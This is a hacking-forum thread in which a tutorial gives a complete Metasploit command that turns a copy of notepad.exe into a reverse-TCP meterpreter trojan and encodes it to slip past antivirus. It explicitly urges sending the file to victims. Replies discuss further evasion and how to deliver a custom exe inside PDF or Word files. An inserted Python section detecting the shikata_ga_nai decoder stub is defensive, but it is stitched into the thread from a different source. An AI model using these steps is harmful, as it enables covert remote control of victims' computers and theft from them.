EvilZone
Hacking and Security => swartz, November 23, 2014, 07:07:55 PM
-
Hi everyone, in my first post I will show you how to create a reverse meterpreter payload from a "clean" Windows exe file, and then
we will encode it to avoid most AVs. I will use shikata_ga_nai as the encoder, but you can use more than one encoder for a better result,
and you can even remove all the bad chars and generate some NOP shellcode for a more advanced result.
To see all the msfencoders you can use the msfencode -l command.
In this tutorial I will use notepad.exe from Windows.
Before we start I will list all the options that will be used, for the people who don't know what each option does.
-e = selection of encoder
-c = how many times we will encode our payload
-t = output file format
-x = specifies the executable file that we want to encode
-o = where to save the new file
First copy notepad.exe and paste it on your Kali desktop.
OK, now we open our terminal and use this command:
msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=XXXX R | msfencode -e x86/shikata_ga_nai -c 30 -t exe -x /root/Desktop/notepad.exe -o /root/Desktop/notepad2.exe
and hit enter... wait until it creates the payload and encodes it 30 times, as we
specified. If everything went right you will see a notepad2.exe file on your desktop; that's our payload. So now we can send our payload
to the victim or upload it for more victims.
You have to use the multi/handler exploit, and don't forget to use the same options as the payload (LPORT etc.).
After uploading it to an online scanner such as VirusTotal the result was 6/54, good enough for me :)
Note: sometimes if you use 2 encoders it may break the payload and you will never get the session.
In the same way you can encode any payload.
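What a signature-based scanner is matching when output from a command like this gets flagged (the 6/54 above is still six detections): an added example, not part of the original thread and not Metasploit's code, that looks for the shape of the shikata_ga_nai decoder stub, the fnstenv GetPC trick followed by pop, xor and loop, in a constructed byte sample. The register choices, key and block count in the sample are made up; the opcode patterns are the standard x86 encodings.

```python
import re

# fnstenv [esp-0xc]: the GetPC trick the shikata_ga_nai decoder stub uses to
# learn its own address. These four bytes are the classic, widely published
# IDS/AV signature for the encoder, whatever key or registers were picked.
FNSTENV_GETPC = b"\xd9\x74\x24\xf4"

def find_shikata_stubs(buf: bytes, window: int = 48) -> list:
    """Heuristic (no emulation): a hit is the GetPC instruction followed within
    `window` bytes by pop r32 (harvest EIP), xor [r32+disp8], r32 (the decrypt
    step) and a backward loop, in that order. Returns one dict per hit."""
    hits = []
    for m in re.finditer(re.escape(FNSTENV_GETPC), buf):
        tail = buf[m.end():m.end() + window]
        # 58..5F -> pop r32, expected right after fnstenv
        pop = next((i for i, b in enumerate(tail[:16]) if 0x58 <= b <= 0x5F), None)
        # 31 /r with ModRM mod=01 (0x40..0x7F) -> xor [reg+disp8], reg
        xor = next((i for i in range(len(tail) - 1)
                    if tail[i] == 0x31 and 0x40 <= tail[i + 1] <= 0x7F), None)
        # E2 rel8 with a negative rel8 -> loop back towards the xor
        loop = next((i for i in range(len(tail) - 1)
                     if tail[i] == 0xE2 and tail[i + 1] >= 0x80), None)
        if None not in (pop, xor, loop) and pop < xor < loop:
            hits.append({"offset": m.start(), "pop": pop, "xor": xor, "loop": loop})
    return hits

def classify(buf: bytes) -> str:
    return "shikata_ga_nai-like decoder stub" if find_shikata_stubs(buf) else "no stub found"

# Constructed sample: a hand-assembled stub in the shape shikata_ga_nai emits
# (random FPU op, key load, GetPC, counter, xor/add/sub/loop) plus filler bytes
# standing in for the encoded body. Key, counter and registers are made up.
SAMPLE_STUB = bytes.fromhex(
    "dac1"          # fcmovb st0, st1      (random FPU instruction)
    "b8efbeadde"    # mov eax, 0xdeadbeef  (constructed key)
    "d97424f4"      # fnstenv [esp-0xc]    (GetPC)
    "5b"            # pop ebx              (ebx = address of the FPU op)
    "31c9b10b"      # xor ecx, ecx ; mov cl, 11   (block counter)
    "314318"        # xor [ebx+0x18], eax  (decrypt one dword)
    "034318"        # add eax, [ebx+0x18]  (feed plaintext back into the key)
    "83ebfc"        # sub ebx, -4          (advance the pointer)
    "e2f5"          # loop -11             (back to the xor)
) + bytes(range(0x10, 0x3c))  # filler standing in for the encoded payload

CLEAN_SAMPLE = b"MZ\x90\x00" + bytes(256)  # constructed: nothing stub-like here
```

Running more iterations (-c 30) only wraps the body in more of these stubs, so the GetPC pattern stays in the file; that is the practical reason the reply further down calls msfencode no AV bypass.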
-
I have encoded my payload with various encodings like you mentioned, but my payload was detected by AV... So I researched and found that it's best to write your own shell in the most unique way; I think I read it on this forum!
Long Live Evilzone!!
Anyway, is there any solution to avoid writing your own shell to avoid detection?
-
ahh metasploit ::)
-
I have encoded my payload with various encodings like you mentioned, but my payload was detected by AV... So I researched and found that it's best to write your own shell in the most unique way; I think I read it on this forum!
Long Live Evilzone!!
Anyway, is there any solution to avoid writing your own shell to avoid detection?
Hi mate, if after encoding your payload it is still detected by AVs, try to remove the bad characters and generate some NOP shellcode as I said in my tut. Don't know why it doesn't work for you with the simple way, it really works for me, but if you want have a look at this video https://www.youtube.com/watch?v=0RkNm7Rdhg0 that I made for another member who faced the same problem. Hope that helps!!
-
Learn shellcoding and write your own encoder/decoder. It's really easy once you get your assembly good.
-
This 'tut' feels borderline scraped from the metasploit website itself...
You could also avoid the hassle almost completely and just write your own shit ;)
Even the IDSes that can detect simple shellcode still fail if you rewrite the original exploit. As for dropping meterpreter or malware, I'm just gonna chuckle and say write your own crap.
Because, see, there's been this nifty cause and effect, or at least a correlation, between how security systems are designed and how security pentesting is done. Metasploit and tools like it have made it so someone can be a 'pentester' with limited scripting skills, never write an original tool in their life, and still get in. Amateur script kiddies copy these pentesters and use the exact same methods and exact same tools in the exact same ways, so security tools have evolved to stop these kinds of attacks. When was the last time you ever saw a headline saying 'we were attacked by X using undiscovered Y and tool Z stopped it!'? No? Why not? Something to think about here...
-
MSFENCODE IS NOT A WAY TO BYPASS ANTIVIRUS
-
But how do I use my custom exe in an exploit like a pdf or word file?
As expected, my custom exe is not detected by antivirus.
What would be the best way to send it to the target?
-
But how do I use my custom exe in an exploit like a pdf or word file?
As expected, my custom exe is not detected by antivirus.
What would be the best way to send it to the target?
If you have to ask, you're not ready to know.
Learn the basics and understand what's going on first.
-
If you have to ask, you're not ready to know.
Learn the basics and understand what's going on first.
Thanks, you are very helpful hahah